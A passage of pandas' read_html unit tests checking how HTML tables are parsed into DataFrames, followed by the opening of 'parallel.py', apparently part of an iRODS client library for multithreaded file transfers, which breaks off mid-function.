with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(spam_data, match=".*Water.*", skiprows="asdf")
def test_index(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self, spam_data):
# 10892 infer_types removed
df1 = self.read_html(spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self, spam_data):
with open(spam_data, encoding="UTF-8") as f:
data1 = StringIO(f.read())
with open(spam_data, encoding="UTF-8") as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, match=".*Water.*")
df2 = self.read_html(data2, match="Unit")
assert_framelist_equal(df1, df2)
def test_string(self, spam_data):
with open(spam_data, encoding="UTF-8") as f:
data = f.read()
df1 = self.read_html(data, match=".*Water.*")
df2 = self.read_html(data, match="Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self, spam_data):
with open(spam_data, encoding="UTF-8") as f:
df1 = self.read_html(f, match=".*Water.*")
with open(spam_data, encoding="UTF-8") as f:
df2 = self.read_html(f, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError, match="urlopen error unknown url type: git"):
self.read_html("git://github.com", match=".*Water.*")
@pytest.mark.slow
@pytest.mark.network
@tm.network
def test_invalid_url(self):
msg = (
"Name or service not known|Temporary failure in name resolution|"
"No tables found"
)
with pytest.raises((URLError, ValueError), match=msg):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
@pytest.mark.slow
def test_file_url(self, banklist_data):
url = banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self, banklist_data):
url = banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, path, *args, **kwargs):
return self.read_html(
path, match="Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self, banklist_data):
df = self._bank_data(banklist_data, header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self, banklist_data):
df = self._bank_data(banklist_data, index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self, banklist_data):
df = self._bank_data(banklist_data, header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self, banklist_data):
df = self._bank_data(banklist_data, header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self, banklist_data):
df = self._bank_data(banklist_data, header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self, banklist_data):
df = self._bank_data(
banklist_data, header=[0, 1], index_col=[0, 1], skiprows=1
)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self, banklist_data):
url = banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self, spam_data):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(spam_data, match="Water", skiprows=-1)
@pytest.mark.network
@tm.network(url="https://docs.python.org/2/", check_before_test=True)
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@pytest.mark.network
@tm.network(url="https://docs.python.org/2/", check_before_test=True)
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_banklist_header(self, banklist_data, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(banklist_data, match="Metcalf", attrs={"id": "table"})[0]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols].apply(to_datetime)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self, banklist_data):
gc = "Gold Canyon"
with open(banklist_data) as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(banklist_data, match="Gold Canyon", attrs={"id": "table"})[
0
]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, match="Arizona", header=1)[0]
assert result.shape == (60, 12)
assert "Unnamed" in result.columns[-1]
assert result["sq mi"].dtype == np.dtype("float64")
assert np.allclose(result.loc[0, "sq mi"], 665384.04)
def test_wikipedia_states_multiindex(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
result = self.read_html(data, match="Arizona", index_col=0)[0]
assert result.shape == (60, 11)
assert "Unnamed" in result.columns[-1][1]
assert result.columns.nlevels == 2
assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)
def test_parser_error_on_empty_header_row(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
expected = DataFrame(
[["a", "b"]],
columns=MultiIndex.from_tuples(
[("Unnamed: 0_level_0", "A"), ("Unnamed: 1_level_0", "B")]
),
)
tm.assert_frame_equal(result[0], expected)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("arg", [True, False])
def test_bool_header_arg(self, spam_data, arg):
# GH 6114
msg = re.escape(
"Passing a bool to header is invalid. Use header=None for no header or "
"header=int or list-like of ints to specify the row(s) making up the "
"column names"
)
with pytest.raises(TypeError, match=msg):
self.read_html(spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
@pytest.mark.filterwarnings(
"ignore:You provided Unicode markup but also provided a value for "
"from_encoding.*:UserWarning"
)
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
def __iter__(self):
# to fool `is_file_like`, should never end up here
assert False
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
# force import check by reinitalising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
def test_parse_path_object(self, datapath):
# GH 37705
file_path_string = datapath("io", "data", "html", "spam.html")
file_path = Path(file_path_string)
df1 = self.read_html(file_path_string)[0]
df2 = self.read_html(file_path)[0]
tm.assert_frame_equal(df1, df2)
|
parallel.py
|
#!/usr/bin/env python
from __future__ import print_function
import os
import ssl
import time
import sys
import logging
import contextlib
import concurrent.futures
import threading
import multiprocessing
import six
from irods.data_object import iRODSDataObject
from irods.exception import DataObjectDoesNotExist
import irods.keywords as kw
from six.moves.queue import Queue,Full,Empty
logger = logging.getLogger( __name__ )
_nullh = logging.NullHandler()
logger.addHandler( _nullh )
MINIMUM_SERVER_VERSION = (4,2,9)
try:
from threading import Barrier # Use 'Barrier' class if included (as in Python >= 3.2) ...
except ImportError: # ... but otherwise, use this ad hoc:
class Barrier(object):
def __init__(self, n):
"""Initialize a Barrier to wait on n threads."""
self.n = n
self.count = 0
self.mutex = threading.Semaphore(1)
self.barrier = threading.Semaphore(0)
def wait(self):
"""Per-thread wait function.
As in Python3.2 threading, returns 0 <= wait_serial_int < n
"""
self.mutex.acquire()
self.count += 1
count = self.count
self.mutex.release()
if count == self.n: self.barrier.release()
self.barrier.acquire()
self.barrier.release()
return count - 1
@contextlib.contextmanager
def enableLogging(handlerType,args,level_ = logging.INFO):
"""Context manager for temporarily enabling a logger. For debug or test.
Usage Example -
with irods.parallel.enableLogging(logging.FileHandler,('/tmp/logfile.txt',)):
# parallel put/get code here
"""
h = None
saveLevel = logger.level
try:
logger.setLevel(level_)
h = handlerType(*args)
h.setLevel( level_ )
logger.addHandler(h)
yield
finally:
logger.setLevel(saveLevel)
if h in logger.handlers:
logger.removeHandler(h)
RECOMMENDED_NUM_THREADS_PER_TRANSFER = 3
verboseConnection = False
class BadCallbackTarget(TypeError): pass
class AsyncNotify (object):
"""A type returned when the PUT or GET operation passed includes NONBLOCKING.
If enabled, the callback function (or callable object) will be triggered
when all parts of the parallel transfer are complete. It should accept
exactly one argument, the irods.parallel.AsyncNotify instance that
is calling it.
"""
def set_transfer_done_callback( self, callback ):
if callback is not None:
if not callable(callback):
raise BadCallbackTarget( '"callback" must be a callable accepting at least 1 argument' )
self.done_callback = callback
def __init__(self, futuresList, callback = None, progress_Queue = None, total = None, keep_ = ()):
"""AsyncNotify initialization (used internally to the io.parallel library).
The casual user will only be concerned with the callback parameter, called when all threads
of the parallel PUT or GET have been terminated and the data object closed.
"""
self._futures = set(futuresList)
self._futures_done = dict()
self.keep = dict(keep_)
self._lock = threading.Lock()
self.set_transfer_done_callback (callback)
self.__done = False
if self._futures:
for future in self._futures: future.add_done_callback( self )
else:
self.__invoke_done_callback()
self.progress = [0, 0]
if (progress_Queue) and (total is not None):
self.progress[1] = total
def _progress(Q,this): # - thread to update progress indicator
while this.progress[0] < this.progress[1]:
i = None
try:
i = Q.get(timeout=0.1)
except Empty:
pass
if i is not None:
if isinstance(i,six.integer_types) and i >= 0: this.progress[0] += i
else: break
self._progress_fn = _progress
self._progress_thread = threading.Thread( target = self._progress_fn, args = (progress_Queue, self))
self._progress_thread.start()
@staticmethod
def asciiBar( lst, memo = [1] ):
memo[0] += 1
spinner = "|/-\\"[memo[0]%4]
percent = "%5.1f%%"%(lst[0]*100.0/lst[1])
mbytes = "%9.1f MB / %9.1f MB"%(lst[0]/1e6,lst[1]/1e6)
if lst[1] != 0:
s = " {spinner} {percent} [ {mbytes} ] "
else:
s = " {spinner} "
return s.format(**locals())
def wait_until_transfer_done (self, timeout=float('inf'), progressBar = False):
carriageReturn = '\r'
begin = t = time.time()
end = begin + timeout
while not self.__done:
time.sleep(min(0.1, max(0.0, end - t)))
t = time.time()
if t >= end: break
if progressBar:
print (' ' + self.asciiBar( self.progress ) + carriageReturn, end='', file=sys.stderr)
sys.stderr.flush()
return self.__done
def __call__(self,future): # Our instance is called by each future (individual file part) when done.
# When all futures are done, we invoke the configured callback.
with self._lock:
self._futures_done[future] = future.result()
if len(self._futures) == len(self._futures_done): self.__invoke_done_callback()
def __invoke_done_callback(self):
try:
if callable(self.done_callback): self.done_callback(self)
finally:
self.keep.pop('mgr',None)
self.__done = True
self.set_transfer_done_callback(None)
@property
def futures(self): return list(self._futures)
@property
def futures_done(self): return dict(self._futures_done)
class Oper(object):
"""A custom enum-type class with utility methods. """
GET = 0
PUT = 1
NONBLOCKING = 2
def __int__(self):
"""Return the stored flags as an integer bitmask. """
return self._opr
def __init__(self, rhs):
"""Initialize with a bit mask of flags ie. whether Operation PUT or GET,
and whether NONBLOCKING."""
self._opr = int(rhs)
def isPut(self): return 0 != (self._opr & self.PUT)
def isGet(self): return not self.isPut()
def isNonBlocking(self): return 0 != (self._opr & self.NONBLOCKING)
def data_object_mode(self, initial_open = False):
if self.isPut():
return 'w' if initial_open else 'a'
else:
return 'r'
def disk_file_mode(self, initial_open = False, binary = True):
if self.isPut():
mode = 'r'
else:
mode = 'w' if initial_open else 'r+'
return ((mode + 'b') if binary else mode)
def _io_send_bytes_progress (queueObject, item):
try:
queueObject.put(item)
return True
except Full:
return False
COPY_BUF_SIZE = (1024 ** 2) * 4
def _copy_part( src, dst, length, queueObject, debug_info, mgr):
bytecount = 0
accum = 0
while True and bytecount < length:
buf = src.read(min(COPY_BUF_SIZE, length - bytecount))
buf_len = len(buf)
if 0 == buf_len: break
dst.write(buf)
bytecount += buf_len
accum += buf_len
if queueObject and accum and _io_send_bytes_progress(queueObject,accum): accum = 0
if verboseConnection:
print ("("+debug_info+")",end='',file=sys.stderr)
sys.stderr.flush()
# In a put or get, exactly one of (src,dst) is a file. Find which and close that one first.
(file_,obj_) = (src,dst) if dst in mgr else (dst,src)
file_.close()
mgr.remove_io( obj_ ) # 1. closes obj if it is not the mgr's initial descriptor
# 2. blocks at barrier until all transfer threads are done copying
# 3. closes with finalize if obj is mgr's initial descriptor
return bytecount
class _Multipart_close_manager:
def __init__(self, initial_io_, exit_barrier_):
self.exit_barrier = exit_barrier_
self.initial_io = initial_io_
self.__lock = threading.Lock()
self.aux = []
def __contains__(self,Io):
with self.__lock:
return Io is self.initial_io or \
Io in self.aux
# `add_io' - add an i/o object to be managed
# note: `remove_io' should only be called for managed i/o objects
def add_io(self,Io):
with self.__lock:
if Io is not self.initial_io:
self.aux.append(Io)
# `remove_io' is for closing a channel of parallel i/o and allowing the
# data object to flush write operations (if any) in a timely fashion. It also
# synchronizes all of the parallel threads just before exit, so that we know
# exactly when to perform a finalizing close on the data object
def remove_io(self,Io):
is_initial = True
with self.__lock:
if Io is not self.initial_io:
Io.close()
self.aux.remove(Io)
is_initial = False
self.exit_barrier.wait()
if is_initial: self.finalize()
def finalize(self):
self.initial_io.close()
def _io_part (objHandle, range_, file_, opr_, mgr_, thread_debug_id = '', queueObject = None ):
if 0 == len(range_): return 0
Operation = Oper(opr_)
(offset,length) = (range_[0], len(range_))
objHandle.seek(offset)
file_.seek(offset)
if thread_debug_id == '':
thread_debug_id = str(threading.currentThread().ident)
return ( _copy_part (file_, objHandle, length, queueObject, thread_debug_id, mgr_) if Operation.isPut()
else _copy_part (objHandle, file_, length, queueObject, thread_debug_id, mgr_) )
def _io_multipart_threaded(operation_ , dataObj_and_IO, replica_token, hier_str, session, fname,
total_size, num_threads = 0, **extra_options):
"""Called by _io_main.
Carve up (0,total_size) range into `num_threads` parts and initiate a transfer thread for each one."""
(D, Io) = dataObj_and_IO
Operation = Oper( operation_ )
if num_threads < 1:
num_threads = RECOMMENDED_NUM_THREADS_PER_TRANSFER
num_threads = max(1, min(multiprocessing.cpu_count(), num_threads))
P = 1 + (total_size // num_threads)
logger.info("num_threads = %s ; (P)artitionSize = %s", num_threads, P)
ranges = [six.moves.range(i*P,min(i*P+P,total_size)) for i in range(num_threads) if i*P < total_size]
_queueLength = extra_options.get('_queueLength',0)
if _queueLength > 0:
queueObject = Queue(_queueLength)
else:
queueObject = None
futures = []
executor = concurrent.futures.ThreadPoolExecutor(max_workers = num_threads)
num_threads = min(num_threads, len(ranges))
mgr = _Multipart_close_manager(Io, Barrier(num_threads))
counter = 1
gen_file_handle = lambda: open(fname, Operation.disk_file_mode(initial_open = (counter == 1)))
File = gen_file_handle()
for r in ranges:
if Io is None:
Io = session.data_objects.open( D.path, Operation.data_object_mode(initial_open = False),
create = False, finalize_on_close = False,
**{kw.RESC_HIER_STR_KW: hier_str, kw.REPLICA_TOKEN_KW: replica_token} )
mgr.add_io( Io )
if File is None: File = gen_file_handle()
